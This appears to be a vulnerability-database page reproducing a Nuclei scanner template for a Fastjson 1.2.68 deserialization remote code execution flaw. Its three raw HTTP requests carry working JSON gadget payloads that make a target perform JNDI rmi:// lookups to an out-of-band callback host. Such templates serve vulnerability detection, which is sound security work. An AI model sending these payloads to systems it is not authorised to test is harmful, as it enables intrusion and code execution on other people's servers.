fastjson-1-2-68-rce: Fastjson 1.2.68 - Remote Code Execution

2025-08-01 Fastjson PoC Public

Description

Fastjson 1.2.68 is susceptible to a deserialization remote code execution vulnerability.

PoC

id: fastjson-1-2-68-rce

info:
  name: Fastjson 1.2.68 - Remote Code Execution
  author: zh
  severity: critical
  description: |
    Fastjson 1.2.68 is susceptible to a deserialization remote code execution vulnerability.
  reference:
    - https://github.com/tdtc7/qps/tree/4042cf76a969ccded5b30f0669f67c9e58d1cfd2/Fastjson
    - https://github.com/wyzxxz/fastjson_rce_tool
  classification:
    cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H
    cvss-score: 10
    cwe-id: CWE-77,CWE-502
  metadata:
    max-request: 3
  tags: fastjson,rce,deserialization,oast,vuln

http:
  - raw:
      - |
        POST / HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/json

        {
           "@type":"org.apache.shiro.jndi.JndiObjectFactory",
           "resourceName":"rmi://{{interactsh-url}}/Exploit"
        }
      - |
        POST / HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/json

        {
           "@type":"org.apache.ignite.cache.jta.jndi.CacheJndiTmLookup",
           "jndiNames":"rmi://{{interactsh-url}}/Exploit"
        }
      - |
        POST / HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/json

        {
           "@type":"br.com.anteros.dbcp.AnterosDBCPConfig",
           "metricRegistry":"rmi://{{interactsh-url}}/Exploit"
        }

    stop-at-first-match: true

    matchers-condition: and
    matchers:
      - type: word
        part: interactsh_protocol # Confirms DNS Interaction
        words:
          - "dns"

      - type: status
        negative: true
        status:
          - 200
# digest: 4a0a0047304502200cdbd56d0c3e20d45c7a94698d9aba44aa82a132e72e186c7b20a9c067aa5daf0221008c96b1758d172402ece19ae01bcf66153ead99c638f2818b80a947a42fb63ea0:922c64590222798bb761d5b6d8e72950

# Visit https://trap.biu.life/ to view exploit trends for this vulnerability.

References

Related Vulnerabilities